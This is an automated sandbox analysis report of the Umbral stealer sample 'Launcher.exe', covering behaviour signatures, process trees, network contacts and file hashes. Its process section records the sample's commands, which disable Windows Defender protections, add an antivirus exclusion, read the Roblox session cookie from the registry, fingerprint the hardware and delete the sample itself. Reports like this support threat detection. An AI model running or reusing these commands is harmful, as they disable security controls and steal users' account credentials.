Malware Analysis Report

2024-10-10 10:00

Sample ID 240623-mzjlgasenk
Target Launcher.exe
SHA256 e6cff5f372b24b858c8252b4ac04b4fe5dc3726391aefcdd880dd3d946854f82
Tags
umbral execution spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e6cff5f372b24b858c8252b4ac04b4fe5dc3726391aefcdd880dd3d946854f82

Threat Level: Known bad

The file Launcher.exe was found to be: Known bad.

Malicious Activity Summary

umbral execution spyware stealer

Detect Umbral payload

Umbral

Umbral family

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Views/modifies file attributes

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Detects videocard installed

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-23 10:54

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral family

umbral

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-23 10:54

Reported

2024-06-23 10:56

Platform

win10v2004-20240508-en

Max time kernel

131s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral

stealer umbral

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3344 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\SYSTEM32\attrib.exe
PID 3344 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\SYSTEM32\attrib.exe
PID 3344 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3344 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3344 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3344 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3344 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3344 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3344 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3344 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3344 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\System32\Wbem\wmic.exe
PID 3344 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\System32\Wbem\wmic.exe
PID 3344 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\System32\Wbem\wmic.exe
PID 3344 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\System32\Wbem\wmic.exe
PID 3344 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\System32\Wbem\wmic.exe
PID 3344 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\System32\Wbem\wmic.exe
PID 3344 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3344 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3344 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\System32\Wbem\wmic.exe
PID 3344 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\System32\Wbem\wmic.exe
PID 3344 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\SYSTEM32\cmd.exe
PID 3344 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Windows\SYSTEM32\cmd.exe
PID 4936 wrote to memory of 2892 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 4936 wrote to memory of 2892 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Launcher.exe

"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Launcher.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Launcher.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3468,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=2404 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 142.53.16.96.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp

Files

memory/3344-0-0x00007FFF91693000-0x00007FFF91695000-memory.dmp

memory/3344-1-0x000001AF59740000-0x000001AF597C2000-memory.dmp

memory/3344-2-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

memory/1716-13-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

memory/1716-8-0x000002AE2B740000-0x000002AE2B762000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gqz0lbfq.2pm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1716-14-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

memory/1716-15-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

memory/1716-18-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/3344-33-0x000001AF73F00000-0x000001AF73F76000-memory.dmp

memory/3344-34-0x000001AF73E80000-0x000001AF73ED0000-memory.dmp

memory/3344-35-0x000001AF59C50000-0x000001AF59C6E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 54aedd8ae6d952259963d00d6c9cdf53
SHA1 302bc83ecb4a617b42ccae70cdda687716403093
SHA256 22c855bccd69d0a9821ec1d789df6ddf2b0adc57e3e8794f72c93902633df524
SHA512 3fb90037c29c28991bdb75779259f4ab750d91d5dde74b64fa5531ba349e21dd9aef35471dc9b090c8343e5102367167fbcc9cc11ee637a3f6e50c993c1f5c39

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 548dd08570d121a65e82abb7171cae1c
SHA1 1a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256 cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA512 37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

memory/3344-69-0x000001AF73F80000-0x000001AF73F92000-memory.dmp

memory/3344-68-0x000001AF73ED0000-0x000001AF73EDA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a741693e3bedb37a2fd9108dda307de0
SHA1 8e91bc3dc6205b7ea5fb0772f75c727712498bee
SHA256 8b76b4abf8b6c8cc9ad4024b6c75c930b3ef82d8e2b41522925cd274f029dc3c
SHA512 0f59e51db6d3677d07b902c68e79ee486b1064ff7526c4b18dde82fae87202204ebff4171e85cd88fe4588f1922a9d1be99d678db0f76e61e26578e30d79854f

memory/3344-87-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-23 10:54

Reported

2024-06-23 10:56

Platform

win11-20240419-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral

stealer umbral

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Launcher.exe

"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp

Files

memory/396-0-0x00007FF8651F3000-0x00007FF8651F5000-memory.dmp

memory/396-1-0x000002459BC40000-0x000002459BCC2000-memory.dmp

memory/396-2-0x00007FF8651F0000-0x00007FF865CB2000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

MD5 18951ad4190ed728ba23e932e0c6e0db
SHA1 fa2d16fcbc3defd07cb8f21d8ea4793a21f261f0
SHA256 66607b009c345a8e70fc1e58ab8a13bbea0e370c8d75f16d2cce5b876a748915
SHA512 a67237089efa8615747bdc6cfe0afc977dc54cfd624a8d2e5124a441c204f1ec58ee7cfbbc105ddc2c18d4f254b9e124d71630bcdba0253d41a96890104f2fff

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

MD5 ee87a5df2cec41353233851e9956d539
SHA1 cdd287b4be58f5ee3464c31c9f073daad13f2eb7
SHA256 2c25ce8141d1e6e601907a4d54f367ba7f6032c9596d24b30a245d94b719c880
SHA512 3afe8451239bbfa4c7cd6ad4e123d8558aba43a570998ef76834dd12b8b0266a4c9dc7bf57dd9a903208a029f3a0ae54822f1ba1d29414615bdcea963b062379

memory/396-22-0x00007FF8651F3000-0x00007FF8651F5000-memory.dmp

memory/396-23-0x00007FF8651F0000-0x00007FF865CB2000-memory.dmp